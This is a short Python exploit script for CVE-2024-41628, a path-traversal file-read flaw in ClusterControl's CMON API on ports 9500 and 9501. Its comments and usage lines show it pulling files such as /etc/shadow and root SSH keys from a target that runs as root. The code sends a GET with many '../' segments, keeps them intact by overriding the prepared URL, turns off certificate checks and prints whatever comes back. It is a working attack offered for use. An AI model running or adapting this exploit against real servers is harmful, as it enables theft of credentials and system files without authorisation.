# Simple exploit script developed by Redshift Cyber Security for the ClusterControl LFI vulnerability (CVE-2024-41628).
# The vulnerability affects the CMON API and specifically the RPC and RPC-TLS user interfaces which by default reside on port 9500 and 9501 respectively.
# Due to ClusterControl also typically running as root, any system file can be retrieved (for example: /etc/shadow or /root/.ssh/id_rsa).
# Affected versions of ClusterControl are 1.9.8 before 1.9.8-9778, 2.0.0 before 2.0.0-9779, and 2.1.0 before 2.1.0-9780.
#
# Usage: python3 exploit.py ip port file
# Help: python3 exploit.py -h
# Example: python3 exploit.py 127.0.0.1 9500 /etc/shadow

import requests
import argparse
import urllib3
from argparse import RawTextHelpFormatter

def main():
    """Command-line entry point: parse ip/port/file, send one GET and print the body.

    Positional arguments (see the parser below): target IP, port (int) and
    the path of the file to request. The response body is written to stdout
    unchanged; no status-code check is performed, so a 4xx/5xx page is
    printed just like a successful read.
    """

    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # This is to disable SSL warnings when exploiting via port 9501
    
    parser = argparse.ArgumentParser(description='CVE-2024-41628 ClusterControl LFI developed by Redshift Cyber Security:\n\nSpecify IP address and port of vulnerable target and which file to be retrieved', formatter_class=RawTextHelpFormatter)
    parser.add_argument("ip", help="Specify target IP address")
    parser.add_argument("port", help="Specify port to exploit (default: 9500 or 9501)", type=int)
    parser.add_argument("file", help="Specify file to retrieve (eg., /etc/shadow)")
    args = parser.parse_args()

    # Port 9501 is the RPC-TLS interface (see the header comment), so only that
    # port gets an https:// scheme; every other port is requested over plain http.
    # In both cases the traversal segments are part of the request path, which is
    # what a web-server access log or a normalizing reverse proxy would record/see.
    if args.port == 9501:
        url = f"https://{args.ip}:{args.port}/../../../../../../../../../{args.file}"
    else:
        url = f"http://{args.ip}:{args.port}/../../../../../../../../../{args.file}"

    session = requests.Session()
    req = requests.Request('GET', url)
    prepped = req.prepare()
    # NOTE(review): the URL is re-assigned after prepare(), so the request goes out
    # with the path exactly as built above rather than as prepare() rewrote it —
    # presumably to keep the ".." segments intact; confirm against the installed
    # requests/urllib3 versions.
    prepped.url = url
    # verify=False disables TLS certificate validation (relevant for the 9501 case).
    response = session.send(prepped, verify=False)
    print(response.text)

# Only run when executed as a script, not when imported as a module.
if __name__ == "__main__":
    main()